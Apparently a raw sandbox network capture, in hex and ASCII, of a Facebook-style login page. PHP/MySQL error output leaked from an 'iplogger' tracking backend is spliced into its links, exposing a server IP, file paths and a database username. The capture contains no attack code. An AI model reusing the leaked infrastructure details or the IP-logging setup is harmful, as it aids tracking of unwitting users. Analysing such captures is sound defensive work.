2022-10-07 13:59:18 UTC	481	IN	Data Raw: 63 34 62 32 0d 0a 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 65 72 72 22 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 65 6d 61 69 6c 22 20 63 6c 61 73 73 3d 22 69 6e 70 75 74 74 65 78 74 20 6c 6f 67 69 6e 5f 66 6f 72 6d 5f 69 6e 70 75 74 5f 62 6f 78 22 20 6e 61 6d 65 3d 22 65 6d 61 69 6c 22 20 69 64 3d 22 65 6d 61 69 6c 22 20 64 61 74 61 2d 74 65 73 74 69 64 3d 22 72 6f 79 61 6c 5f 65 6d 61 69 6c 22 20 2f 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 65 72 73 22 3e 3c 6c 61 62 65 6c 20 66 6f 72 3d 22 70 61 73 73 22 3e 50 61 73 73 77 6f 72 64 3c 2f 6c 61 62 65 6c 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 65 72 73 22 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 70 61 73 73 77 6f 72 64 22 20 63 6c 61 73 73 3d 22 69 Data Ascii: c4b2></div><div class="_err"><input type="email" class="inputtext login_form_input_box" name="email" id="email" data-testid="royal_email" /></div><div class="_ers"><label for="pass">Password</label></div><div class="_ers"><input type="password" class="i
2022-10-07 13:59:18 UTC	482	IN	Data Raw: 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 79 6c 39 22 3e 44 6f 20 79 6f 75 20 77 61 6e 74 20 74 6f 20 6a 6f 69 6e 20 46 61 63 65 62 6f 6f 6b 3f 3c 2f 64 69 76 3e 3c 61 20 72 6f 6c 65 3d 22 62 75 74 74 6f 6e 22 20 63 6c 61 73 73 3d 22 5f 34 32 66 74 20 5f 34 6a 79 30 20 5f 79 6c 61 20 5f 34 6a 79 33 20 5f 34 6a 79 32 20 73 65 6c 65 63 74 65 64 20 5f 35 31 73 79 20 6d 72 6d 22 20 68 72 65 66 3d 22 2f 72 65 67 2f 3f 70 72 69 76 61 63 79 5f 6d 75 74 61 74 69 6f 6e 5f 74 6f 6b 65 6e 3d 65 79 4a 30 65 58 42 6c 49 6a 6f 77 4c 43 4a 6a 63 6d 56 68 64 47 6c 76 62 6c 39 30 61 57 31 6c 49 6a 6f 78 4e 6a 59 31 4d 54 55 78 4d 54 55 34 4c 43 4a 6a 59 57 78 73 63 32 6c 30 5a 56 39 70 5a 43 49 36 4d 7a 59 7a 4f 54 59 35 4d 44 51 30 4f 44 63 34 4f 54 49 34 66 51 25 33 44 Data Ascii: ><div class="_yl9">Do you want to join Facebook?</div><a role="button" class="_42ft _4jy0 _yla _4jy3 _4jy2 selected _51sy mrm" href="/reg/?privacy_mutation_token=eyJ0eXBlIjowLCJjcmVhdGlvbl90aW1lIjoxNjY1MTUxMTU4LCJjYWxsc2l0ZV9pZCI6MzYzOTY5MDQ0ODc4OTI4fQ%3D
2022-10-07 13:59:18 UTC	484	IN	Data Raw: 70 61 6e 3e 3c 61 20 68 72 65 66 3d 22 2f 68 65 6c 70 2f 3f 72 65 66 3d 34 30 34 22 20 64 61 74 61 2d 67 74 3d 22 26 23 31 32 33 3b 26 71 75 6f 74 3b 74 61 72 67 65 74 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 65 6c 70 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6d 61 72 6b 65 74 69 6e 67 5f 70 61 67 65 5f 63 6c 69 63 6b 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 31 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 63 6f 6e 76 65 72 73 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 31 26 71 75 6f 74 3b 26 23 31 32 35 3b 22 3e 56 69 73 69 74 20 6f 75 72 20 48 65 6c 70 20 43 65 6e 74 65 72 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 63 71 75 22 3e 3c 64 69 76 20 69 64 3d 22 70 61 67 65 46 6f 6f 74 65 72 22 20 64 61 Data Ascii: pan><a href="/help/?ref=404" data-gt="{"target":"help","marketing_page_click":"1","conversion":"1"}">Visit our Help Center</a></div></div></div><div class="_cqu"><div id="pageFooter" da
2022-10-07 13:59:18 UTC	485	IN	Data Raw: 75 73 69 6e 67 25 32 30 70 61 73 73 77 6f 72 64 3a 25 32 30 59 45 53 29 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 73 65 6c 65 63 74 25 32 30 69 70 6c 6f 67 67 65 72 25 32 30 66 72 6f 6d 25 32 30 74 5f 63 68 61 6e 6e 65 6c 73 25 32 30 77 68 65 72 65 25 32 30 6e 61 6d 65 3d 26 23 30 33 39 3b 33 38 62 32 63 37 61 31 61 66 34 35 34 64 33 38 32 39 32 37 66 38 31 35 34 33 64 38 36 30 35 35 38 38 36 62 63 30 32 38 36 33 34 35 37 26 23 30 33 39 3b 25 32 30 6c 69 6d 69 74 25 32 30 30 2c 31 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 73 6d 61 6c 6c 25 33 45 25 30 41 25 33 43 66 6f 6e 74 25 32 30 63 6f 6c 6f 72 3d 25 32 32 25 32 33 66 66 30 30 30 30 25 32 32 25 33 45 25 35 42 54 45 50 25 32 30 53 54 4f 50 25 35 44 25 33 Data Ascii: using%20password:%20YES)%3Cbr%3E%0A%3Cbr%3Eselect%20iplogger%20from%20t_channels%20where%20name='38b2c7a1af454d382927f81543d86055886bc02863457'%20limit%200,1%3Cbr%3E%0A%3Cbr%3E%0A%3Csmall%3E%0A%3Cfont%20color=%22%23ff0000%22%3E%5BTEP%20STOP%5D%3
2022-10-07 13:59:18 UTC	486	IN	Data Raw: 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 57 61 72 6e 69 6e 67 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 3a 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 5f 71 75 65 72 79 28 29 5c 75 30 30 32 35 32 30 65 78 70 65 63 74 73 5c 75 30 30 32 35 32 30 70 61 72 61 6d 65 74 65 72 5c 75 30 30 32 35 32 30 32 5c 75 30 30 32 35 32 30 74 6f 5c 75 30 30 32 35 32 30 62 65 5c 75 30 30 32 35 32 30 72 65 73 6f 75 72 63 65 2c 5c 75 30 30 32 35 32 30 62 6f 6f 6c 65 61 6e 5c 75 30 30 32 35 32 30 67 69 76 65 6e 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 Data Ascii: 0253E\u00250A\u00253Cbr\u002520\/\u00253E\u00250A\u00253Cb\u00253EWarning\u00253C\/b\u00253E:\u002520\u002520mysql_query()\u002520expects\u002520parameter\u0025202\u002520to\u002520be\u002520resource,\u002520boolean\u002520given\u002520in\u002520\u00253Cb
2022-10-07 13:59:18 UTC	488	IN	Data Raw: 30 64 65 70 72 65 63 61 74 65 64 25 32 30 61 6e 64 25 32 30 77 69 6c 6c 25 32 30 62 65 25 32 30 72 65 6d 6f 76 65 64 25 32 30 69 6e 25 32 30 74 68 65 25 32 30 66 75 74 75 72 65 3a 25 32 30 75 73 65 25 32 30 6d 79 73 71 6c 69 25 32 30 6f 72 25 32 30 50 44 4f 25 32 30 69 6e 73 74 65 61 64 25 32 30 69 6e 25 32 30 25 33 43 62 25 33 45 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 25 33 43 2f 62 25 33 45 25 32 30 6f 6e 25 32 30 6c 69 6e 65 25 32 30 25 33 43 62 25 33 45 34 37 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 25 33 45 57 61 72 6e Data Ascii: 0deprecated%20and%20will%20be%20removed%20in%20the%20future:%20use%20mysqli%20or%20PDO%20instead%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarn
2022-10-07 13:59:18 UTC	489	IN	Data Raw: 30 32 35 32 30 54 68 65 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 5c 75 30 30 32 35 32 30 65 78 74 65 6e 73 69 6f 6e 5c 75 30 30 32 35 32 30 69 73 5c 75 30 30 32 35 32 30 64 65 70 72 65 63 61 74 65 64 5c 75 30 30 32 35 32 30 61 6e 64 5c 75 30 30 32 35 32 30 77 69 6c 6c 5c 75 30 30 32 35 32 30 62 65 5c 75 30 30 32 35 32 30 72 65 6d 6f 76 65 64 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 74 68 65 5c 75 30 30 32 35 32 30 66 75 74 75 72 65 3a 5c 75 30 30 32 35 32 30 75 73 65 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 69 5c 75 30 30 32 35 32 30 6f 72 5c 75 30 30 32 35 32 30 50 44 4f 5c 75 30 30 32 35 32 30 69 6e 73 74 65 61 64 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 5c 2f 77 77 77 5c 2f 77 77 Data Ascii: 02520The\u002520mysql\u002520extension\u002520is\u002520deprecated\u002520and\u002520will\u002520be\u002520removed\u002520in\u002520the\u002520future:\u002520use\u002520mysqli\u002520or\u002520PDO\u002520instead\u002520in\u002520\u00253Cb\u00253E\/www\/ww
2022-10-07 13:59:18 UTC	491	IN	Data Raw: 75 30 30 32 35 32 30 64 65 6e 69 65 64 5c 75 30 30 32 35 32 30 66 6f 72 5c 75 30 30 32 35 32 30 75 73 65 72 5c 75 30 30 32 35 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 5c 75 30 30 34 30 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 5c 75 30 30 32 35 32 30 28 75 73 69 6e 67 5c 75 30 30 32 35 32 30 70 61 73 73 77 6f 72 64 3a 5c 75 30 30 32 35 32 30 59 45 53 29 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 73 65 6c 65 63 74 5c 75 30 30 32 35 32 30 69 70 6c 6f 67 67 65 72 5c 75 30 30 32 35 32 30 66 72 6f 6d 5c 75 30 30 32 35 32 30 74 5f 63 68 61 6e 6e 65 6c 73 5c 75 30 30 32 35 32 30 77 68 65 72 65 5c 75 30 30 32 35 32 30 6e 61 6d 65 3d Data Ascii: u002520denied\u002520for\u002520user\u002520'dbnew01'\u0040'localhost'\u002520(using\u002520password:\u002520YES)\u00253Cbr\u00253E\u00250A\u00253Cbr\u00253Eselect\u002520iplogger\u002520from\u002520t_channels\u002520where\u002520name=
2022-10-07 13:59:18 UTC	492	IN	Data Raw: 69 6e 67 25 33 43 2f 62 25 33 45 3a 25 32 30 25 32 30 6d 79 73 71 6c 5f 71 75 65 72 79 28 29 25 32 30 65 78 70 65 63 74 73 25 32 30 70 61 72 61 6d 65 74 65 72 25 32 30 32 25 32 30 74 6f 25 32 30 62 65 25 32 30 72 65 73 6f 75 72 63 65 2c 25 32 30 62 6f 6f 6c 65 61 6e 25 32 30 67 69 76 65 6e 25 32 30 69 6e 25 32 30 25 33 43 62 25 33 45 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 25 33 43 2f 62 25 33 45 25 32 30 6f 6e 25 32 30 6c 69 6e 65 25 32 30 25 33 43 62 25 33 45 37 33 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 66 6f 6e 74 25 32 30 63 6f 6c 6f 72 3d 25 32 32 25 32 33 30 30 30 Data Ascii: ing%3C/b%3E:%20%20mysql_query()%20expects%20parameter%202%20to%20be%20resource,%20boolean%20given%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E73%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cfont%20color=%22%23000
2022-10-07 13:59:18 UTC	494	IN	Data Raw: 75 30 30 32 35 32 30 41 63 63 65 73 73 5c 75 30 30 32 35 32 30 64 65 6e 69 65 64 5c 75 30 30 32 35 32 30 66 6f 72 5c 75 30 30 32 35 32 30 75 73 65 72 5c 75 30 30 32 35 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 5c 75 30 30 34 30 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 5c 75 30 30 32 35 32 30 28 75 73 69 6e 67 5c 75 30 30 32 35 32 30 70 61 73 73 77 6f 72 64 3a 5c 75 30 30 32 35 32 30 59 45 53 29 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 5c 2f 77 77 77 5c 2f 77 77 77 72 6f 6f 74 5c 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 5c 2f 73 65 65 6d 6f 72 65 62 74 79 5c 2f 69 6e 63 6c 75 64 65 73 5c 2f 64 61 74 61 62 61 73 65 2e 70 68 70 5c 75 30 30 32 35 33 Data Ascii: u002520Access\u002520denied\u002520for\u002520user\u002520'dbnew01'\u0040'localhost'\u002520(using\u002520password:\u002520YES)\u002520in\u002520\u00253Cb\u00253E\/www\/wwwroot\/103.136.42.153\/seemorebty\/includes\/database.php\u00253
2022-10-07 13:59:18 UTC	495	IN	Data Raw: 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 5c 2f 66 6f 6e 74 5c 75 30 30 32 35 33 45 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74 6f 72 26 71 75 6f 74 3b 2c 20 32 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 20 74 69 74 6c 65 3d 22 49 74 61 6c 69 61 6e 22 3e 49 74 61 6c 69 61 6e 6f 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 5f 73 76 34 22 20 64 69 72 3d 22 6c 74 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 74 2d Data Ascii: \u00253E\u00250A\u00253Cbr\u00253E\u00250A\u00253Cbr\u00253E\u00250A\u00253C\/b\u00253E\u00250A\u00253C\/font\u00253E", "www_list_selector", 2); return false;" title="Italian">Italiano</a></li><li><a class="_sv4" dir="ltr" href="https://pt-
2022-10-07 13:59:18 UTC	497	IN	Data Raw: 74 25 32 30 63 6f 6c 6f 72 3d 25 32 32 25 32 33 66 66 30 30 30 30 25 32 32 25 33 45 25 35 42 54 45 50 25 32 30 53 54 4f 50 25 35 44 25 33 43 2f 66 6f 6e 74 25 33 45 25 30 41 25 33 43 2f 73 6d 61 6c 6c 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 2f 66 6f 6e 74 25 33 45 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 71 75 69 72 65 28 26 71 75 6f 74 3b 49 6e 74 6c 55 74 69 6c 73 26 71 75 6f 74 3b 29 2e 73 65 74 43 6f 6f 6b 69 65 4c 6f 63 61 6c 65 28 26 71 75 6f 74 3b 70 74 5f 50 54 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 65 6e 5f 55 53 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 70 74 2d 70 74 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 5c 75 30 30 32 35 Data Ascii: t%20color=%22%23ff0000%22%3E%5BTEP%20STOP%5D%3C/font%3E%0A%3C/small%3E%0A%3Cbr%3E%0A%3Cbr%3E%0A%3C/b%3E%0A%3C/font%3E" onclick="require("IntlUtils").setCookieLocale("pt_PT", "en_US", "https:\/\/pt-pt.facebook.com\/\u0025
2022-10-07 13:59:18 UTC	498	IN	Data Raw: 6f 6f 6c 65 61 6e 5c 75 30 30 32 35 32 30 67 69 76 65 6e 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 5c 2f 77 77 77 5c 2f 77 77 77 72 6f 6f 74 5c 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 5c 2f 73 65 65 6d 6f 72 65 62 74 79 5c 2f 69 6e 63 6c 75 64 65 73 5c 2f 64 61 74 61 62 61 73 65 2e 70 68 70 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 32 30 6f 6e 5c 75 30 30 32 35 32 30 6c 69 6e 65 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 37 33 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 Data Ascii: oolean\u002520given\u002520in\u002520\u00253Cb\u00253E\/www\/wwwroot\/103.136.42.153\/seemorebty\/includes\/database.php\u00253C\/b\u00253E\u002520on\u002520line\u002520\u00253Cb\u00253E73\u00253C\/b\u00253E\u00250A\u00253Cbr\u002520\/\u00253E\u00250A\u00
2022-10-07 13:59:18 UTC	500	IN	Data Raw: 32 30 6f 6e 25 32 30 6c 69 6e 65 25 32 30 25 33 43 62 25 33 45 34 37 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 25 33 45 57 61 72 6e 69 6e 67 25 33 43 2f 62 25 33 45 3a 25 32 30 25 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 25 32 30 41 63 63 65 73 73 25 32 30 64 65 6e 69 65 64 25 32 30 66 6f 72 25 32 30 75 73 65 72 25 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 26 23 30 36 34 3b 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 25 32 30 28 75 73 69 6e 67 25 32 30 70 61 73 73 77 6f 72 64 3a 25 32 30 59 45 53 29 25 32 30 69 6e 25 32 30 25 33 43 62 25 33 45 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 Data Ascii: 20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_pconnect():%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%20in%20%3Cb%3E/www/wwwroot/103.136.4
2022-10-07 13:59:18 UTC	501	IN	Data Raw: 35 32 30 6f 72 5c 75 30 30 32 35 32 30 50 44 4f 5c 75 30 30 32 35 32 30 69 6e 73 74 65 61 64 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 5c 2f 77 77 77 5c 2f 77 77 77 72 6f 6f 74 5c 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 5c 2f 73 65 65 6d 6f 72 65 62 74 79 5c 2f 69 6e 63 6c 75 64 65 73 5c 2f 64 61 74 61 62 61 73 65 2e 70 68 70 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 32 30 6f 6e 5c 75 30 30 32 35 32 30 6c 69 6e 65 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 34 37 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 Data Ascii: 520or\u002520PDO\u002520instead\u002520in\u002520\u00253Cb\u00253E\/www\/wwwroot\/103.136.42.153\/seemorebty\/includes\/database.php\u00253C\/b\u00253E\u002520on\u002520line\u002520\u00253Cb\u00253E47\u00253C\/b\u00253E\u00250A\u00253Cbr\u002520\/\u00253E
2022-10-07 13:59:18 UTC	503	IN	Data Raw: 65 63 74 5c 75 30 30 32 35 32 30 69 70 6c 6f 67 67 65 72 5c 75 30 30 32 35 32 30 66 72 6f 6d 5c 75 30 30 32 35 32 30 74 5f 63 68 61 6e 6e 65 6c 73 5c 75 30 30 32 35 32 30 77 68 65 72 65 5c 75 30 30 32 35 32 30 6e 61 6d 65 3d 26 23 30 33 39 3b 33 38 62 32 63 37 61 31 61 66 34 35 34 64 33 38 32 39 32 37 66 38 31 35 34 33 64 38 36 30 35 35 38 38 36 62 63 30 32 38 36 33 34 35 37 26 23 30 33 39 3b 5c 75 30 30 32 35 32 30 6c 69 6d 69 74 5c 75 30 30 32 35 32 30 30 2c 31 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 73 6d 61 6c 6c 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 66 6f 6e 74 5c 75 30 30 32 35 Data Ascii: ect\u002520iplogger\u002520from\u002520t_channels\u002520where\u002520name='38b2c7a1af454d382927f81543d86055886bc02863457'\u002520limit\u0025200,1\u00253Cbr\u00253E\u00250A\u00253Cbr\u00253E\u00250A\u00253Csmall\u00253E\u00250A\u00253Cfont\u0025
2022-10-07 13:59:18 UTC	504	IN	Data Raw: 33 45 37 33 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 66 6f 6e 74 25 32 30 63 6f 6c 6f 72 3d 25 32 32 25 32 33 30 30 30 30 30 30 25 32 32 25 33 45 25 30 41 25 33 43 62 25 33 45 31 30 34 35 25 32 30 2d 25 32 30 41 63 63 65 73 73 25 32 30 64 65 6e 69 65 64 25 32 30 66 6f 72 25 32 30 75 73 65 72 25 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 26 23 30 36 34 3b 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 25 32 30 28 75 73 69 6e 67 25 32 30 70 61 73 73 77 6f 72 64 3a 25 32 30 59 45 53 29 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 73 65 6c 65 63 74 25 32 30 69 70 6c 6f 67 67 65 72 25 32 30 66 72 6f 6d 25 32 30 74 5f 63 68 61 6e 6e 65 6c 73 25 32 30 77 68 65 72 65 25 Data Ascii: 3E73%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cfont%20color=%22%23000000%22%3E%0A%3Cb%3E1045%20-%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%3Cbr%3E%0A%3Cbr%3Eselect%20iplogger%20from%20t_channels%20where%
2022-10-07 13:59:18 UTC	506	IN	Data Raw: 33 2e 31 33 36 2e 34 32 2e 31 35 33 5c 2f 73 65 65 6d 6f 72 65 62 74 79 5c 2f 69 6e 63 6c 75 64 65 73 5c 2f 64 61 74 61 62 61 73 65 2e 70 68 70 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 32 30 6f 6e 5c 75 30 30 32 35 32 30 6c 69 6e 65 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 34 37 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 57 61 72 6e 69 6e 67 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 Data Ascii: 3.136.42.153\/seemorebty\/includes\/database.php\u00253C\/b\u00253E\u002520on\u002520line\u002520\u00253Cb\u00253E47\u00253C\/b\u00253E\u00250A\u00253Cbr\u002520\/\u00253E\u00250A\u00253Cbr\u002520\/\u00253E\u00250A\u00253Cb\u00253EWarning\u00253C\/b\u002
2022-10-07 13:59:18 UTC	507	IN	Data Raw: 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 5f 73 76 34 22 20 64 69 72 3d 22 6c 74 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 72 2d 74 72 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 25 33 45 44 65 70 72 65 63 61 74 65 64 25 33 43 2f 62 25 33 45 3a 25 32 30 25 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 25 32 30 54 68 65 25 32 30 6d 79 73 71 6c 25 32 30 65 78 74 65 6e 73 69 6f 6e 25 32 30 69 73 25 32 30 64 65 70 72 65 63 61 74 65 64 25 32 30 61 6e 64 25 32 30 77 69 6c 6c 25 32 30 62 65 25 32 30 72 65 6d 6f 76 65 64 25 32 30 69 6e 25 32 30 74 68 65 25 32 30 66 75 74 75 72 65 3a 25 32 30 75 73 65 25 32 30 6d 79 73 71 6c 69 25 32 30 6f 72 25 32 30 50 44 4f 25 Data Ascii: /a></li><li><a class="_sv4" dir="ltr" href="https://tr-tr.facebook.com/%3Cbr%20/%3E%0A%3Cb%3EDeprecated%3C/b%3E:%20%20mysql_pconnect():%20The%20mysql%20extension%20is%20deprecated%20and%20will%20be%20removed%20in%20the%20future:%20use%20mysqli%20or%20PDO%
2022-10-07 13:59:18 UTC	508	IN	Data Raw: 65 6e 5f 55 53 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 74 72 2d 74 72 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 44 65 70 72 65 63 61 74 65 64 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 3a 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 5c 75 30 30 32 35 32 30 54 68 65 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 5c 75 30 30 32 35 32 30 65 78 74 65 6e 73 69 6f 6e 5c 75 30 30 32 35 32 30 69 73 5c 75 30 30 32 35 32 30 64 65 70 72 65 63 61 74 65 64 5c 75 30 30 32 35 32 30 61 6e 64 5c 75 30 30 32 35 32 30 77 69 Data Ascii: en_US", "https:\/\/tr-tr.facebook.com\/\u00253Cbr\u002520\/\u00253E\u00250A\u00253Cb\u00253EDeprecated\u00253C\/b\u00253E:\u002520\u002520mysql_pconnect():\u002520The\u002520mysql\u002520extension\u002520is\u002520deprecated\u002520and\u002520wi
